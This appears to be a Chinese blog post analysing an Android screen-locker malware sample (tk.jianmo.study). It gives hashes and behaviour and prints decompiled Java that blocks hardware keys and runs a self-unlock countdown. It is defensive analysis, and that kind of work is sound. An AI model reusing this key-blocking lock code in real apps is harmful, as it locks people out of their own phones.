Android病毒样本分析(1)

1.基本信息

病毒名称: 1.apk

文件名称: 建设控件

文件MD5: 5B22058C7632AA3211987B1ABDD8E3D0

文件包名: tk.jianmo.study

数字签名:O=1_sign.apk

2.基本行为

程序启动后直接进入锁屏界面，开机自启动，按键无响应

3.详细分析

1. 通过改写onKeyDown方法,屏蔽返回键、音量键、菜单键等虚拟按键,造成不响应按键动作的效果,来达到锁屏的目的。

@Overridepublic boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent){if (paramInt == 4){if (this.keyTouthInt != 0) {break label151;}this.usedTime = SystemClock.currentThreadTimeMillis();this.keyTouthInt = 1;this.usedTime = System.currentTimeMillis();}for (;;){if (paramInt == 3){keytouch(this.usedTime, this.keyTouthInt, 5);if (this.keyTouthInt == 6) {new MyDialogFragment().show(getFragmentManager(), "mydialog");}}if (paramInt == 82) {keytouch(this.usedTime, this.keyTouthInt, 100);}if (paramInt == 25) {keytouch(this.usedTime, this.keyTouthInt, 2);}if (paramInt == 24) {keytouch(this.usedTime, this.keyTouthInt, 3);}if (paramInt == 26) {Toast.makeText(this, "开机自启，关机无效哦。", 0).show();}return true;label151:if (this.keyTouthInt == 1) {keytouch(this.usedTime, this.keyTouthInt, 1);} else {keytouch(this.usedTime, this.keyTouthInt, 4);}}}

2、程序获取了当前时间，并且设置了时间函数，使程序执行时间到作者设置的时候后，就会自动解除锁屏

 startService(this.intent);                                                     //启动服务this.sp = getSharedPreferences("TimeSave", 0);this.timetofinish = this.sp.getInt("saveTime", this.timetofinish);if (this.timetofinish <= 1) {this.timetofinish = this.theBeginTimeToFinish;}this.timer = new Timer();                                               //设置时间this.timertask = new TimerTask(){@Overridepublic void run(){MainActivity.this.runOnUiThread(new Runnable(){@Overridepublic void run(){int i = MainActivity.this.timetofinish / 3600;int j = MainActivity.this.timetofinish % 3600 / 60;int k = MainActivity.this.timetofinish;MainActivity.this.tv_time.setText(new StringBuffer().append(new StringBuffer().append(new StringBuffer().append(new StringBuffer().append(i).append("时").toString()).append(j).toString()).append("分").toString()).append(k % 60).toString() + "秒后手机自爆！");MainActivity.this.sp.edit().putInt("saveTime", MainActivity.this.timetofinish).commit();if (MainActivity.this.timetofinish == 0){MainActivity.this.stopService(MainActivity.this.intent);   //终止服务}MainActivity localMainActivity = MainActivity.this;localMainActivity.timetofinish -= 1;}});}};

Android病毒样本分析(1)相关推荐

android病毒样本分析（红包助手）
目录 1．样本概况... 3 1.1 样本信息... 3 1.2 测试环境及工具... 3 1.3 分析目标... 3 2．具体分析... 4 2.1 加固情况... 4 2.2代码分析片段... 4 ...
Android病毒样本分析(4)
1.基本信息病毒名称: SD-Booster.apk 文件名称: SD-booster 文件MD5: 50836808A5FE7FEBB6CE8B2109D6C93A 文件包名: de.mehrma ...
Android版本的 Wannacry 文件加密病毒样本分析附带锁机
一.前言之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...
Android版本的Wannacry文件加密病毒样本分析(附带锁机)
一.前言之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...
Android版本的”Wannacry”文件加密病毒样本分析(附带锁机)
一.病毒样本分析点击免费激活,出现授权界面: 需要设备管理器,是想修改锁机密码,我们就授权,然后分析程序找到重置的密码就好了:授权之后,就被锁屏了,解锁屏幕会出现: 病毒作者真够狠的,竟然自己弄了一 ...
无文件攻击与病毒样本分析-1-1-1-无文件攻击介绍
目录无文件攻击与病毒样本分析-0-1-1-目录_千里ZLP的博客-CSDN博客https://wittpeng.blog.csdn.net/article/details/124712530?spm ...
无文件攻击与病毒样本分析-1-4-2-无文件攻击之恶意脚本：WScript和CScript
目录无文件攻击与病毒样本分析-0-1-1-目录_千里ZLP的博客-CSDN博客在一个月内,将持续研究并发布一套关于"无文件攻击技术与相关病毒样本分析"的系列文章,为便于查看,将在 ...
incaformat蠕虫病毒样本分析及查杀防范措施
2021incaseformat蠕虫病毒一.病毒简介二.样本分析三.查杀与恢复方式四.预防措施一.病毒简介病毒名称:incaseformat 病毒性质:蠕虫病毒影响范围:windows ...
火绒一面病毒样本分析
样本信息 MD5: 6E4B0A001C493F0FCF8C5E9020958F38 SHA1:BEA213F1C932455AEE8FF6FDE346B1D1960D57FF CRC32: 1 ...

Android病毒样本分析(1)

Android病毒样本分析(1)相关推荐

最新文章

热门文章